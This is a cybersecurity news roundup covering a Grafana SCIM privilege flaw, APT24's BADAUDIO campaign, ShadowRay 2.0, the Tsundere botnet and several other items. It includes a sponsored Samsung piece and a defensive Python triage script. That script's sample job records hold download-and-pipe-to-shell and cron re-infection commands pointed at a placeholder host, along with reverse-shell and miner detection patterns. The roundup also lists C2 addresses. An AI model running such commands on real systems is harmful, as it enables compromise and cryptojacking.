2025-11-22 AI Startup News

Grafana Patches CVSS 10.0 SCIM Flaw Enabling Impersonation and Privilege Escalation

Grafana has released security updates to address a maximum severity security flaw that could allow privilege escalation or user impersonation under certain configurations. The vulnerability, tracked as CVE-2025-41115, carries a CVSS score of 10.0. It resides in the System for Cross-domain Identity Management (SCIM) component that allows automated user provisioning and management. First introduced in April 2025, it’s currently in public preview.

“In Grafana versions 12.x where SCIM provisioning is enabled and configured, a vulnerability in user identity handling allows a malicious or compromised SCIM client to provision a user with a numeric externalId, which in turn could allow for overriding internal user IDs and lead to impersonation or privilege escalation,” Grafana’s Vardan Torosyan said. That said, successful exploitation hinges on both conditions being met:

- the enableSCIM feature flag is set to true
- the user_sync_enabled config option in the [auth.scim] block is set to true

The shortcoming affects Grafana Enterprise versions from 12.0.0 to 12.2.1. It has been addressed in the following versions of the software:

- Grafana Enterprise 12.0.6+security-01
- Grafana Enterprise 12.1.3+security-01
- Grafana Enterprise 12.2.1+security-01
- Grafana Enterprise 12.3.0

“Grafana maps the SCIM externalId directly to the internal user.uid; therefore, numeric values (e.g. ‘1’) may be interpreted as internal numeric user IDs,” Torosyan said.

“In specific cases this could allow the newly provisioned user to be treated as an existing internal account, such as the Admin, leading to potential impersonation or privilege escalation.” The analytics and observability platform said the vulnerability was discovered internally on November 4, 2025, during an audit and testing. Given the severity of the issue, users are advised to apply the patches as soon as possible to mitigate potential risks.
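To make the identity-handling problem concrete, here is an added simulation (not Grafana’s code) of the bug class the advisory describes: a toy user table whose rows carry both an internal numeric id and a string uid, a loose lookup that treats a numeric string as an internal id, and the hardened provisioning check a defender would want, which refuses purely numeric externalIds. The class and function names, the uid character policy and the sample accounts are all assumptions made for the example.

```python
"""Simulation of the identity-handling bug class behind CVE-2025-41115.

Constructed example, not Grafana's code. It shows why mapping a SCIM
externalId straight onto a string uid is dangerous when some lookup path
also accepts numeric strings as internal ids, and what the hardened
provisioning check looks like.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class User:
    id: int            # internal numeric primary key; the first account gets id 1
    uid: str           # string identifier; the SCIM externalId is mapped onto this column
    login: str
    is_admin: bool = False


class UserStore:
    """Toy user table. The first account created is the built-in Admin (id == 1)."""

    def __init__(self) -> None:
        self._by_id: Dict[int, User] = {}
        self._next_id = 1
        self.create("admin", uid="local-admin-uid", is_admin=True)

    def create(self, login: str, uid: str, is_admin: bool = False) -> User:
        user = User(self._next_id, uid, login, is_admin)
        self._by_id[user.id] = user
        self._next_id += 1
        return user

    def all_users(self) -> List[User]:
        return list(self._by_id.values())

    def lookup_by_uid(self, uid: str) -> Optional[User]:
        """Strict resolution: only the uid column is consulted."""
        return next((u for u in self._by_id.values() if u.uid == uid), None)

    def lookup_loose(self, identifier: str) -> Optional[User]:
        """Vulnerable resolution: a numeric string is tried as an internal id first,
        so a provisioned user whose uid is "1" resolves to whoever owns id 1."""
        if identifier.isdigit():
            hit = self._by_id.get(int(identifier))
            if hit is not None:
                return hit
        return self.lookup_by_uid(identifier)


# Assumed policy for this example: externalIds must be non-numeric and drawn from a
# conservative character set, which keeps them out of the internal id namespace.
EXTERNAL_ID_PATTERN = re.compile(r"[A-Za-z0-9._:@-]{1,190}")


def validate_external_id(external_id: str) -> str:
    """Hardened check: refuse an externalId that could be read as an internal numeric id."""
    if external_id.strip().isdigit():
        raise ValueError(f"externalId {external_id!r} is purely numeric; refusing to map it to uid")
    if not EXTERNAL_ID_PATTERN.fullmatch(external_id):
        raise ValueError(f"externalId {external_id!r} contains characters outside the allowed set")
    return external_id


def provision_vulnerable(store: UserStore, external_id: str, login: str) -> User:
    """Maps externalId straight onto uid, the behaviour the advisory describes."""
    return store.create(login, uid=external_id)


def provision_hardened(store: UserStore, external_id: str, login: str) -> User:
    """Same mapping, but only after the externalId passes validation."""
    return store.create(login, uid=validate_external_id(external_id))


def audit_numeric_uids(store: UserStore) -> List[User]:
    """Defender's sweep: list already-provisioned users whose uid is purely numeric."""
    return [u for u in store.all_users() if u.uid.isdigit()]


if __name__ == "__main__":
    store = UserStore()
    provision_vulnerable(store, external_id="1", login="scim-provisioned")
    resolved = store.lookup_loose("1")
    print(f"loose lookup of '1' -> {resolved.login} (is_admin={resolved.is_admin})")
    print("numeric uids needing review:", [u.login for u in audit_numeric_uids(store)])
    try:
        provision_hardened(store, external_id="1", login="another")
    except ValueError as exc:
        print("hardened provisioning rejected it:", exc)
```

The audit function is the part worth running against a real directory export after patching: any SCIM-provisioned account whose uid is purely numeric deserves a manual review.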

Google Brings AirDrop Compatibility to Android’s Quick Share Using Rust-Hardened Security

In a surprise move, Google on Thursday announced that it has updated Quick Share, its peer-to-peer file transfer service, to work with Apple’s AirDrop, allowing users to more easily share files and photos between Android and iPhone devices. The cross-platform sharing feature is currently limited to the Pixel 10 lineup and works with iPhone, iPad, and macOS devices, with plans to expand to additional Android devices in the future. In order to transfer a file from a Pixel 10 phone over AirDrop, the only caveat is that the owner of the Apple device is required to make sure their iPhone (or iPad or Mac) is discoverable to anyone – which can be enabled for 10 minutes. Likewise, to receive content from an Apple device, Android device users will need to adjust their Quick Share visibility settings to Everyone for 10 minutes or be in Receive mode on the Quick Share page, according to a support document published by Google.

“We built Quick Share’s interoperability support for AirDrop with the same rigorous security standards that we apply to all Google products,” Dave Kleidermacher, vice president of Platforms Security and Privacy at Google, said. At the heart of the feature is a multi-layered security approach that’s powered by the memory-safe Rust programming language to create a secure sharing channel that Google said eliminates entire classes of memory safety vulnerabilities, making its implementation resilient against attacks that attempt to exploit memory errors. The tech giant also noted that the feature does not rely on any workaround and that the data is not routed through a server, adding it’s open to working with Apple to enable “Contacts Only” mode in the future. “Google’s implementation of its version of Quick Share does not introduce vulnerabilities into the broader protocol’s ecosystem,” NetSPI, which carried out an independent assessment in August 2025, said.

“While it shares specific characteristics with implementations made by other manufacturers, this implementation is reasonably more secure. In fact, the process of file exchange is notably stronger, as it doesn’t leak any information, which is a common weakness in other manufacturers’ implementations.” That said, its analysis uncovered a low-severity information disclosure vulnerability (CVSS score: 2.1) that could permit an attacker with physical access to the device to access information, such as image thumbnails and SHA256 hashes of phone numbers and email addresses. It has since been addressed by Google. The development comes as Google said it blocked in India more than 115 million attempts to install sideloaded apps that request access to sensitive permissions for financial fraud.

The company also said it’s piloting a new feature in the country in collaboration with financial services like Google Pay, Navi, and Paytm to combat scams that trick users into opening the apps when sharing their screens. “Devices running Android 11+ now show a prominent alert if a user opens one of these apps while screen sharing on a call with an unknown contact,” Evan Kotsovinos, vice president of privacy, safety, and security at Google, said. “This feature provides a one-tap option to end the call and stop screen sharing, protecting users from potential fraud.” Lastly, Google said it’s also developing Enhanced Phone Number Verification (ePNV), which it described as a new Android-based security protocol that replaces SMS OTP flows with SIM-based verification to improve sign-in security.


Why IT Admins Choose Samsung for Mobile Security

Ever wonder how some IT teams keep corporate data safe without slowing down employees? Of course you have. Mobile devices are essential for modern work—but with mobility comes risk. IT admins, like you, juggle protecting sensitive data while keeping teams productive.

That’s why more enterprises are turning to Samsung for mobile security. Hey—you’re busy, so here’s a quick-read article on what makes Samsung Galaxy devices and Knox Suite really stand out.

Security built in. Management simplified.

Samsung Galaxy devices come with Samsung Knox built in at the manufacturing stage, creating a hardware foundation that extends visibility and control across your security infrastructure.

- Simplified management with Knox Suite: Samsung’s all-in-one package to manage and secure work devices grants centralized control without the need for extra tools or workflows (that got your attention!).
- Integrated security: Samsung Knox is built into both hardware and software, giving multi-layered protection against malware attacks.
- Government-grade protection: Secure boot, trusted execution environments, and more—that means these devices are ready for enterprise demands!

With Samsung Galaxy, security isn’t just software—it’s the foundation of your devices.

Strengthening Zero Trust without the hassle

Mobile threats can appear anywhere. To mitigate the risks, Samsung Galaxy devices are Zero Trust ready, while Samsung Knox enforces strict access controls within your systems. Let’s take a quick look:

- Device Integrity: Samsung Galaxy devices, managed or unmanaged, verify their integrity before connecting to corporate resources.
- Zero Trust Network Access (ZTNA): Businesses can get high-speed Zero Trust Network Access natively from Samsung Galaxy devices.
- Real-time security signals: Knox Asset Intelligence (part of Knox Suite - Enterprise Plan) sends almost-real-time device telemetry into security information and event management (SIEM) tools, so mobile threats appear alongside other alerts. Check out Samsung’s article on Knox Asset Intelligence for Microsoft Sentinel!

Think of it as a live dashboard for every device without adding extra complexity. Samsung Knox helps you stay strict without making life harder for your team—that’s a win-win!

Extending your EMM strategy… without adding headaches

Knox Suite amplifies the EMM tools you already use, further strengthening your enterprise mobility management. IT admins get deeper security, smarter insights, and tighter control while keeping existing workflows intact. What’s more, it’s compatible with most EMM tools! With Knox Suite, you can:

- Equip your frontline with the tools they need to succeed. Leverage powerful features such as Knox Authentication Manager for seamless, secure access. And, ensure operational continuity of your Line of Business apps by enforcing OS compatibility through Knox E-FOTA.
- Gain unmatched control and security over your organization’s devices with Knox Mobile Enrollment, which allows you to securely lock devices to your organization–even after a factory reset–until released by an admin.
- Stay ahead of threats with the Knox Asset Intelligence security center dashboard, which provides a comprehensive look at your entire Samsung fleet, highlighting vulnerabilities and patch levels for unique chipsets.

In short, Knox Suite enhances the value of your EMM tools—providing IT with enterprise-grade security and visibility without slowing day-to-day operations.

Why Samsung is a trusted partner for IT admins

Here’s the deal: Samsung’s Knox Suite helps to manage and secure work devices for today’s challenges and tomorrow’s threats.

- Protect sensitive data: Layered hardware and software defences keep corporate information safe.
- Maintain productivity: Users stay productive while IT remains in control.
- Future-ready: Knox evolves alongside security threats, policies, and enterprise needs.

Security doesn’t have to be complicated—it just needs the right foundation. By choosing Samsung, enterprises can confidently embrace mobility while safeguarding their most valuable assets: data and reputation. Want to be the IT hero who brought security and productivity to your team? Here’s all you need to know!

This article is a contributed piece from one of our valued partners.

APT24 Deploys BADAUDIO in Years-Long Espionage Hitting Taiwan and 1,000+ Domains

A China-nexus threat actor known as APT24 has been observed using a previously undocumented malware dubbed BADAUDIO to establish persistent remote access to compromised networks as part of a nearly three-year campaign. “While earlier operations relied on broad strategic web compromises to compromise legitimate websites, APT24 has recently pivoted to using more sophisticated vectors targeting organizations in Taiwan,” Google Threat Intelligence Group (GTIG) researchers Harsh Parashar, Tierra Duncan, and Dan Perez said. “This includes the repeated compromise of a regional digital marketing firm to execute supply chain attacks and the use of targeted phishing campaigns.” APT24, also called Pitty Tiger, is the moniker assigned to a suspected Chinese hacking group that has targeted government, healthcare, construction and engineering, mining, nonprofit, and telecommunications sectors in the U.S. and Taiwan.

According to a July 2014 report from FireEye, the adversary is believed to be active as early as 2008, with the attacks leveraging phishing emails to trick recipients into opening Microsoft Office documents that, in turn, exploit known security flaws in the software (e.g., CVE-2012-0158 and CVE-2014-1761 ) to infect systems with malware. Some of the malware families associated with APT24 include CT RAT, a variant of Enfal/Lurid Downloader called MM RAT (aka Goldsun-B), and variants of Gh0st RAT known as Paladin RAT and Leo RAT. Another notable malware put to use by the threat actor is a backdoor named Taidoor (aka Roudan). APT24 is assessed to be closely related to another advanced persistent threat (APT) group called Earth Aughisky, which has also deployed Taidoor in its campaigns and has leveraged infrastructure previously attributed to APT24 as part of attacks distributing another backdoor referred to as Specas.

Both the malware strains, per an October 2022 report from Trend Micro, are designed to read proxy settings from a specific file “%systemroot%\system32\sprxx.dll.” The latest findings from GTIG show that the BADAUDIO campaign has been underway since November 2022, with the attackers using watering holes, supply chain compromises, and spear-phishing as initial access vectors. A highly obfuscated malware written in C++, BADAUDIO uses control flow flattening to resist reverse engineering and acts as a first-stage downloader that’s capable of downloading, decrypting, and executing an AES-encrypted payload from a hard-coded command and control (C2) server. It works by gathering and exfiltrating basic system information to the server, which responds with the payload to be run on the host. In one case, it was a Cobalt Strike Beacon.

[Figure: BADAUDIO campaign overview]

“BADAUDIO typically manifests as a malicious Dynamic Link Library (DLL) leveraging DLL Search Order Hijacking (MITRE ATT&CK T1574.001) for execution via legitimate applications,” GTIG said. “Recent variants observed indicate a refined execution chain: encrypted archives containing BADAUDIO DLLs along with VBS, BAT, and LNK files.” From November 2022 to at least early September 2025, APT24 is estimated to have compromised more than 20 legitimate websites to inject malicious JavaScript code to specifically exclude visitors coming from macOS, iOS, and Android, generate a unique browser fingerprint using the FingerprintJS library, and serve them a fake pop-up urging them to download BADAUDIO under the guise of a Google Chrome update. Then, starting in July 2024, the hacking group breached a regional digital marketing firm in Taiwan to orchestrate a supply chain attack by injecting the malicious JavaScript into a widely used JavaScript library that the company distributed, effectively allowing it to hijack more than 1,000 domains. The modified third-party script is configured to reach out to a typosquatted domain impersonating a legitimate Content Delivery Network (CDN) and fetch the attacker-controlled JavaScript to fingerprint the machine and then serve the pop-up to download BADAUDIO after validation.

“The compromise in June 2025 initially employed conditional script loading based on a unique web ID (the specific domain name) related to the website using the compromised third-party scripts,” Google said. “This suggests tailored targeting, limiting the strategic web compromise (MITRE ATT&CK T1189) to a single domain.”

[Figure: Compromised JS supply chain attack to deliver BADAUDIO malware]

“However, for a ten-day period in August, the conditions were temporarily lifted, allowing all 1,000 domains using the scripts to be compromised before the original restriction was reimposed.” APT24 has also been observed conducting targeted phishing attacks since August 2024, using lures related to an animal rescue organization to trick recipients into responding and ultimately deliver BADAUDIO via encrypted archives hosted on Google Drive and Microsoft OneDrive. These messages come fitted with tracking pixels to confirm whether the emails were opened by the targets and tailor their efforts accordingly. “The use of advanced techniques like supply chain compromise, multi-layered social engineering, and the abuse of legitimate cloud services demonstrates the actor’s capacity for persistent and adaptive espionage,” Google said.

China-Nexus APT Group Targets Southeast Asia

The disclosure comes as CyberArmor detailed a sustained espionage campaign orchestrated by a suspected China-nexus threat actor against government, media, and news sectors in Laos, Cambodia, Singapore, the Philippines, and Indonesia. The activity has been codenamed Autumn Dragon. The attack chain commences with a RAR archive likely sent as an attachment in spear-phishing messages that, when extracted, exploits a WinRAR security flaw (CVE-2025-8088, CVSS score: 8.8) to launch a batch script (“Windows Defender Definition Update.cmd”) that sets up persistence to ensure that the malware is launched automatically when the user logs in to the system the next time. It also downloads a second RAR archive hosted on Dropbox via PowerShell.

The RAR archive contains two files, a legitimate executable (“obs-browser-page.exe”) and a malicious DLL (“libcef.dll”). The batch script then runs the binary to sideload the DLL, which then communicates with the threat actor over Telegram to fetch commands (“shell”), capture screenshots (“screenshot”), and drop additional payloads (“upload”). “The bot controller (threat actor) uses these three commands to gather information and perform reconnaissance of the victim’s computer and deploy third-stage malware,” security researchers Nguyen Nguyen and BartBlaze said. “This design enables the controller to remain stealthy and evade detection.” The third stage once again involves the use of DLL side-loading to launch a rogue DLL (“CRClient.dll”) by using a real binary (“Creative Cloud Helper.exe”), which then decrypts and runs shellcode responsible for loading and executing the final payload, a lightweight implant written in C++ that can communicate with a remote server (“public.megadatacloud[.]com”) and supports eight different commands:

- 65, to run a specified command using “cmd.exe,” gather the result, and exfiltrate it back to the C2 server
- 66, to load and execute a DLL
- 67, to execute shellcode
- 68, to update configuration
- 70, to read a file supplied by the operator
- 71, to open a file and write the content supplied by the operator
- 72, to get/set the current directory
- 73, to sleep for a random interval and terminate itself

While the activity has not been tied to a specific threat actor or group, it’s possibly the work of a China-nexus group possessing intermediate operational capabilities.

This assessment is based on the adversary’s continued targeting of countries surrounding the South China Sea. “The attack campaign is targeted,” the researchers said. “Throughout our analysis, we frequently observed the next stages being hosted behind Cloudflare, with geo-restrictions enabled, as well as other restrictions such as only allowing specific HTTP User Agents.”

SEC Drops SolarWinds Case After Years of High-Stakes Cybersecurity Scrutiny

The U.S. Securities and Exchange Commission (SEC) has abandoned its lawsuit against SolarWinds and its chief information security officer, which alleged that the company had misled investors about the security practices that led to the 2020 supply chain attack. In a joint motion filed November 20, 2025, the SEC, along with SolarWinds and its CISO Timothy G. Brown, asked the court to voluntarily dismiss the case.

The SEC said its decision to seek dismissal “does not necessarily reflect the Commission’s position on any other case.” SolarWinds and Brown were accused by the SEC in October 2023 of “fraud and internal control failures” and that the company defrauded investors by overstating its cybersecurity practices and understating or failing to disclose known risks. The agency also said both SolarWinds and Brown ignored “repeated red flags” and failed to adequately protect its assets, ultimately leading to the supply chain compromise that came to light in late 2020. The attack was attributed to a Russian state-sponsored threat actor known as APT29. “Brown was aware of SolarWinds’ cybersecurity risks and vulnerabilities but failed to resolve the issues or, at times, sufficiently raise them further within the company,” the SEC alleged at the time.

However, in July 2024, many of these allegations were thrown out by the U.S. District Court for the Southern District of New York (SDNY), which stated that “these do not plausibly plead actionable deficiencies in the company’s reporting of the cybersecurity hack” and that they “impermissibly rely on hindsight and speculation.” Subsequently, the SEC also charged Avaya, Check Point, Mimecast, and Unisys for making “materially misleading disclosures” related to the large-scale cyber attack that stemmed from the SolarWinds hack. In a statement, SolarWinds CEO Sudhakar Ramakrishna said the latest development marks the end of an era that challenged the company, and emphasized “we emerge stronger, more secure, and better prepared than ever for what lies ahead.”

Salesforce Flags Unauthorized Data Access via Gainsight-Linked OAuth Activity

Salesforce has warned of detected “unusual activity” related to Gainsight-published applications connected to the platform. “Our investigation indicates this activity may have enabled unauthorized access to certain customers’ Salesforce data through the app’s connection,” the company said in an advisory. The cloud services firm said it has taken the step of revoking all active access and refresh tokens associated with Gainsight-published applications connected to Salesforce. It has also temporarily removed those applications from the AppExchange as its investigation continues.

Salesforce did not disclose how many customers were impacted by the incident, but said it has notified them. “There is no indication that this issue resulted from any vulnerability in the Salesforce platform,” the company added. “The activity appears to be related to the app’s external connection to Salesforce.” Out of an abundance of caution, the Gainsight app has been temporarily pulled from the HubSpot Marketplace and Zendesk connector access has been revoked. “This may also impact OAuth access for customer connections while the review is taking place,” Gainsight said.

“No suspicious activity related to HubSpot has been observed at this point.” In a post shared on LinkedIn, Austin Larsen, principal threat analyst at Google Threat Intelligence Group (GTIG), described it as an “emerging campaign” targeting Gainsight-published applications connected to Salesforce by compromising third-party OAuth tokens to potentially gain unauthorized access. The activity is assessed to be tied to threat actors associated with the ShinyHunters (aka UNC6240) group, mirroring a similar set of attacks targeting Salesloft Drift instances earlier this August. According to DataBreaches.Net, ShinyHunters has confirmed the campaign is their doing and stated that the Salesloft and Gainsight attack waves allowed them to steal data from nearly 1,000 organizations. Interestingly, Gainsight previously said it was also one of the Salesloft Drift customers impacted in the previous attack.

But it’s not clear at this stage if the earlier breach played a role in the current incident. In that hack, the attackers accessed business contact details for Salesforce-related content, including names, business email addresses, phone numbers, regional/location details, product licensing information, and support case contents (without attachments). “Adversaries are increasingly targeting the OAuth tokens of trusted third-party SaaS integrations,” Larsen pointed out. In light of the malicious activity, organizations are advised to review all third-party applications connected to Salesforce, revoke tokens for unused or suspicious applications, and rotate credentials if anomalies are flagged from an integration.


ShadowRay 2.0 Exploits Unpatched Ray Flaw to Build Self-Spreading GPU Cryptomining Botnet

Oligo Security has warned of ongoing attacks exploiting a two-year-old security flaw in the Ray open-source artificial intelligence (AI) framework to turn infected clusters with NVIDIA GPUs into a self-replicating cryptocurrency mining botnet. The activity, codenamed ShadowRay 2.0, is an evolution of a prior wave that was observed between September 2023 and March 2024. The attack, at its core, exploits a critical missing authentication bug (CVE-2023-48022, CVSS score: 9.8) to take control of susceptible instances and hijack their computing power for illicit cryptocurrency mining using XMRig. The vulnerability has remained unpatched due to a “long-standing design decision” that’s consistent with Ray’s development best practices, which requires it to be run in an isolated network and act upon trusted code.

The campaign involves submitting malicious jobs, with commands ranging from simple reconnaissance to complex multi-stage Bash and Python payloads, to an unauthenticated Ray Job Submission API (“/api/jobs/”) on exposed dashboards. The compromised Ray clusters are then used in spray and pray attacks to distribute the payloads to other Ray dashboards, creating a worm that can essentially spread from one victim to another. The attacks have been found to leverage GitLab and GitHub to deliver the malware, using names like “ironern440-group” and “thisisforwork440-ops” to create repositories and stash the malicious payloads. Both accounts are no longer accessible.

However, the cybercriminals have responded to takedown efforts by creating a new GitHub account, illustrating their tenacity and ability to quickly resume operations. The payloads, in turn, leverage the platform’s orchestration capabilities to pivot laterally to non-internet-facing nodes, spread the malware, create reverse shells to attacker-controlled infrastructure for remote control, and establish persistence by running a cron job every 15 minutes that pulls the latest version of the malware from GitLab to re-infect the hosts. The threat actors “have turned Ray’s legitimate orchestration features into tools for a self-propagating, globally cryptojacking operation, spreading autonomously across exposed Ray clusters,” researchers Avi Lumelsky and Gal Elbaz said. The campaign has likely made use of large language models (LLMs) to create the GitLab payloads.

This assessment is based on the malware’s “structure, comments, and error handling patterns.” The infection chain involves an explicit check to determine if the victim is located in China, and if so, serves a region-specific version of the malware. It’s also designed to eliminate competition by scanning running processes for other cryptocurrency miners and terminating them – a tactic widely adopted by cryptojacking groups to maximize the mining gains from the host. Another notable aspect of the attacks is the use of various tactics to fly under the radar, including disguising malicious processes as legitimate Linux kernel worker services and limiting CPU usage to around 60%. It’s believed that the campaign may have been active since September 2024.

While Ray is meant to be deployed within a “controlled network environment,” the findings show that users are exposing Ray servers to the internet, opening a lucrative attack surface for bad actors who can identify which Ray dashboard IP addresses are exploitable using the open-source vulnerability detection tool interact.sh. More than 230,500 Ray servers are publicly accessible. Anyscale, which originally developed Ray, has released a “Ray Open Ports Checker” tool to validate the proper configuration of clusters to prevent accidental exposure. Other mitigation strategies include configuring firewall rules to limit unauthorized access and adding authorization on top of the Ray Dashboard port (8265 by default).
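For teams that cannot take a dashboard offline immediately, a job-submission triage pass is a practical complement to the firewall and authorization advice above. The following is an added example (not Oligo’s or Ray’s code): it scores constructed job records against the indicators the campaign description gives, namely download-and-run entrypoints pulled from code-hosting sites, cron-based re-infection, reverse shells, miner and DDoS tooling, and jobs that themselves submit to other dashboards’ /api/jobs/ endpoint. The record field names, the trusted network list and the sample entrypoints are assumptions made for the example.

```python
"""Triage of Ray job submissions for the ShadowRay 2.0 pattern.

Constructed example, not Oligo's or Ray's code. The job records below are made
up; their field names (submission_id, source_ip, entrypoint) are assumptions
about what a submission log would carry, and the trusted networks are likewise
assumed. Placeholder hostnames (gitlab.example, EXAMPLE-GROUP) stand in for
the real attacker infrastructure named in the report.
"""
import ipaddress
import re
from typing import Dict, List

# Indicators drawn from the campaign description, each paired with a reason string.
SUSPICIOUS_ENTRYPOINT_PATTERNS = [
    (re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b"), "downloads and pipes a script into a shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "decodes an embedded payload"),
    (re.compile(r"\bcrontab\b|/etc/cron"), "installs a cron job (re-infection persistence)"),
    (re.compile(r"\b(xmrig|stratum\+tcp|sockstress)\b"), "references miner, mining-pool or DDoS tooling"),
    (re.compile(r"/dev/tcp/|\bnc\b[^;|]*\s-e\b"), "opens a reverse shell"),
    (re.compile(r"/api/jobs/"), "submits jobs to other Ray dashboards (worm behaviour)"),
]

# Constructed sample records, not real Ray output.
SAMPLE_JOBS: List[Dict[str, str]] = [
    {"submission_id": "raysubmit_001", "source_ip": "10.0.4.12",
     "entrypoint": "python train.py --epochs 5"},
    {"submission_id": "raysubmit_002", "source_ip": "203.0.113.45",
     "entrypoint": "bash -c 'curl -fsSL https://gitlab.example/EXAMPLE-GROUP/p.sh | bash'"},
    {"submission_id": "raysubmit_003", "source_ip": "10.0.4.30",
     "entrypoint": "sh -c 'echo \"*/15 * * * * curl https://gitlab.example/EXAMPLE-GROUP/u.sh | sh\" | crontab -'"},
    {"submission_id": "raysubmit_004", "source_ip": "198.51.100.7",
     "entrypoint": "python serve.py"},
]


def triage_jobs(jobs: List[Dict[str, str]], trusted_nets: List[str]) -> List[Dict[str, object]]:
    """Return one finding per job that is submitted from outside the trusted
    networks or whose entrypoint matches a campaign indicator."""
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    findings: List[Dict[str, object]] = []
    for job in jobs:
        reasons: List[str] = []
        try:
            addr = ipaddress.ip_address(job["source_ip"])
            # A dashboard that only trusted ranges should reach must never see
            # submissions from elsewhere; any such job is worth a look on its own.
            if not any(addr in net for net in nets):
                reasons.append(f"submitted from untrusted address {addr}")
        except ValueError:
            reasons.append(f"unparseable source address {job['source_ip']!r}")
        for pattern, why in SUSPICIOUS_ENTRYPOINT_PATTERNS:
            if pattern.search(job["entrypoint"]):
                reasons.append(why)
        if reasons:
            findings.append({"submission_id": job["submission_id"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    # Assumed: only the 10.0.0.0/8 range is allowed to talk to the dashboard.
    for finding in triage_jobs(SAMPLE_JOBS, ["10.0.0.0/8"]):
        print(finding["submission_id"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

Feed it the submission records from your own job log (or the output of the dashboard’s job listing, once you have mapped the field names) and treat every finding as a host that also needs its crontab and running processes checked, since the report describes both as persistence points.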

“Attackers deployed sockstress, a TCP state exhaustion tool, targeting production websites. This suggests the compromised Ray clusters are being weaponized for denial-of-service attacks, possibly against competing mining pools or other infrastructure,” Oligo said. “This transforms the operation from pure cryptojacking into a multi-purpose botnet. The ability to launch DDoS attacks adds another monetization vector – attackers can rent out DDoS capacity or use it to eliminate competition.

The target port 3333 is commonly used by mining pools, suggesting attacks against rival mining infrastructure.”

Tsundere Botnet Expands Using Game Lures and Ethereum-Based C2 on Windows

Cybersecurity researchers have warned of an actively expanding botnet dubbed Tsundere that’s targeting Windows users. Active since mid-2025, the threat is designed to execute arbitrary JavaScript code retrieved from a command-and-control (C2) server, Kaspersky researcher Lisandro Ubiedo said in an analysis published today. There are currently no details on how the botnet malware is propagated; however, in at least one case, the threat actors behind the operation are said to have leveraged a legitimate Remote Monitoring and Management (RMM) tool as a conduit to download an MSI installer file from a compromised site. The names given to the malware artifacts – Valorant, r6x (Rainbow Six Siege X), and cs2 (Counter-Strike 2) – also suggest that the implant is likely being disseminated using game-related lures.

It’s possible that users searching for pirated versions of these games are the target. Regardless of the method used, the fake MSI installer is designed to install Node.js and launch a loader script that’s responsible for decrypting and executing the main botnet-related payload. It also prepares the environment by downloading three legitimate libraries, namely, ws, ethers, and pm2, using an “npm install” command. “The pm2 package is installed to ensure the Tsundere bot remains active and used to launch the bot,” Ubiedo explained.

“Additionally, pm2 helps achieve persistence on the system by writing to the registry and configuring itself to restart the process upon login.” Kaspersky’s analysis of the C2 panel has revealed that the malware is also propagated in the form of a PowerShell script, which performs a similar sequence of actions by deploying Node.js on the compromised host and downloading ws and ethers as dependencies. While the PowerShell infector doesn’t make use of pm2, it carries out the same actions observed in the MSI installer by creating a registry key value that ensures the bot is executed on each login by spawning a new instance of itself. The Tsundere botnet makes use of the Ethereum blockchain to fetch details of the WebSocket C2 server (e.g., ws://193.24.123[.]68:3011 or ws://185.28.119[.]179:1234), creating a resilient mechanism that allows the attackers to rotate the infrastructure simply by employing a smart contract. The contract was created on September 23, 2024, and has had 26 transactions to date.

Once the C2 address is retrieved, it checks to ensure it is a valid WebSocket URL, and then proceeds to establish a WebSocket connection with the specific address and receive JavaScript code sent by the server. Kaspersky said it did not observe any follow-up commands from the server during the observation period. “The ability to evaluate code makes the Tsundere bot relatively simple, but it also provides flexibility and dynamism, allowing the botnet administrators to adapt it to a wide range of actions,” Kaspersky said. The botnet operations are facilitated by a control panel that allows logged-in users to build new artifacts using MSI or PowerShell, manage administrative functions, view the number of bots at any given point of time, turn their bots into a proxy for routing malicious traffic, and even browse and purchase botnets via a dedicated marketplace.

Exactly who is behind Tsundere is not known, but the presence of the Russian language in the source code for logging purposes alludes to a threat actor who is Russian-speaking. The activity is assessed to share functional overlaps with a malicious npm campaign documented by Checkmarx, Phylum, and Socket in November 2024. What’s more, the same server has been identified as hosting the C2 panel associated with an information stealer known as 123 Stealer, which is available on a subscription basis for $120 per month. It was first advertised by a threat actor named “koneko” on a dark web forum on June 17, 2025, per Outpost24’s KrakenLabs Team.

Another clue that points to its Russian origins is that the customers are forbidden from using the stealer to target Russia and the Commonwealth of Independent States (CIS) countries. “Violation of this rule will result in the immediate blocking of your account without explanation,” Koneko said in the post at the time. “Infections can occur through MSI and PowerShell files, which provide flexibility in terms of disguising installers, using phishing as a point of entry, or integrating with other attack mechanisms, making it an even more formidable threat,” Kaspersky said.


ThreatsDay Bulletin: 0-Days, LinkedIn Spies, Crypto Crimes, IoT Flaws and New Malware Waves

This week has been crazy in the world of hacking and online security. From Thailand to London to the US, we’ve seen arrests, spies at work, and big power moves online. Hackers are getting caught. Spies are getting better at their jobs.

Even simple things like browser add-ons and smart home gadgets are being used to attack people. Every day, there’s a new story that shows how quickly things are changing in the fight over the internet. Governments are cracking down harder on cybercriminals. Big tech companies are rushing to fix their security.

Researchers keep finding weak spots in apps and devices we use every day. We saw fake job recruiters on LinkedIn spying on people, huge crypto money-laundering cases, and brand-new malware made just to beat Apple’s Mac protections. All these stories remind us: the same tech that makes life better can very easily be turned into a weapon. Here’s a simple look at the biggest cybersecurity news happening right now — from the hidden parts of the dark web to the main battles between countries online.

Chinese operatives mine LinkedIn for political intel

MI5 Warns of Chinese Spies Using LinkedIn to Gather Intel on Lawmakers

U.K.’s domestic intelligence agency MI5 has warned lawmakers that Chinese spies are actively reaching out to “recruit and cultivate” them with lucrative job offers on LinkedIn via headhunters or cover companies. Chinese nationals are said to be using LinkedIn profiles to conduct outreach at scale, allegedly on behalf of the Chinese Ministry of State Security. “Their aim is to collect information and lay the groundwork for long-term relationships, using professional networking sites, recruitment agents and consultants acting on their behalf,” House of Commons Speaker Sir Lindsay Hoyle said. The activity is assessed to be “targeted and widespread.” Targets included parliamentary staff, economists, think tank consultants, and government officials.

In a statement shared with BBC, a spokesperson for the Chinese embassy in the UK said accusations of espionage were “pure fabrication” and accused the U.K. of a “self-staged charade.” MI5 is not the only intelligence agency to warn about social media’s potential to allow spying. In July, Mike Burgess, the Director-General of Australia’s Security Intelligence Organization (ASIO), said a foreign intelligence agency tried to find info about an Australian military project by cultivating relationships with people who worked on it.

EU rewires privacy playbook

E.U. Floats Proposal for GDPR Changes

